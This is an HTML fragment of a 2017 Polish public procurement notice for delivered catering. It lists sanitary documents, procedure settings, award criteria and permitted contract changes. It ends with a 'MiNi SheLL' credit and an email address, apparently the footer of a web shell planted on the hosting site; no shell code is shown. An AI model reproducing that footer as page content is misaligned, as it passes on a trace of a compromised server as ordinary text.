                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający żąda:
a)	decyzję Państwowego Powiatowego Inspektora sanitarnego wydaną w trybie art. 62 ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (Dz. U. 2006r. nr 171 poz. 1225 wraz z późniejszą nowelizacją Dz. U. 2010 r. nr 21 poz. 105) w zakresie produkcji i obrotu żywnością z kuchni, z której dowożone będą posiłki.
b)	decyzję potwierdzającą, że Wykonawca posiada środki transportu przeznaczony do przewozu żywności zgodnie z zaleceniami PPIS.
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin zapłaty</td><td>10</td></tr><tr><td>Gwarancja jakości</td><td>15</td></tr><tr><td>Odległość Zakładu/kuchni </td><td>15</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy. Zamawiający przewiduje możliwość zmiany umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego, a także dotyczą: 
a)	zmiany ilości zamawianego asortymentu przy zachowaniu cen jednostkowych zgodnych z ofertą Wykonawcy,
b)	obniżenia cen netto i brutto w stosunku do cen ofertowych przez Wykonawcę, jak również obniżenie wartości netto lub brutto umowy w poszczególnych pakietach,
c)	zmiany danych Stron ( np. zmiana siedziby, adresu, nazwy),
d)	ograniczenia zakresu rzeczowego i wartości umowy w przypadkach działania siły wyższej lub wystąpienia stanu wyższej konieczności, ograniczenia zakresu rzeczowego i wartości umowy w przypadkach zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia;
e)	rezygnacji z poszczególnych posiłków przez Zamawiającego,
f)	omyłek pisarskich lub błędów rachunkowych,
g)	zmiany miejsca wykonywania posiłków pod warunkiem spełniania przez nowe miejsce wszelkich wymogów, w tym sanitrano  epidemiologicznych określonych w SIWZ,
h)	mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami, zmiany miejsca przygotowywania posiłków lub danych pojazdów dostarczających posiłki pod warunkiem przedstawienia dokumentów potwierdzających dopuszczenie nowego miejsca lub nowych pojazdów do użytku na potrzeby realizacji przedmiotu umowy zgodnie z wymogami sanitarno  epidemiologicznymi,
i)	jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego Zamawiający dopuszcza zmiany umowy określone w art. 144 ust. 1 PZP
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 05/04/2017, godzina: 09:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              POLSKI<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com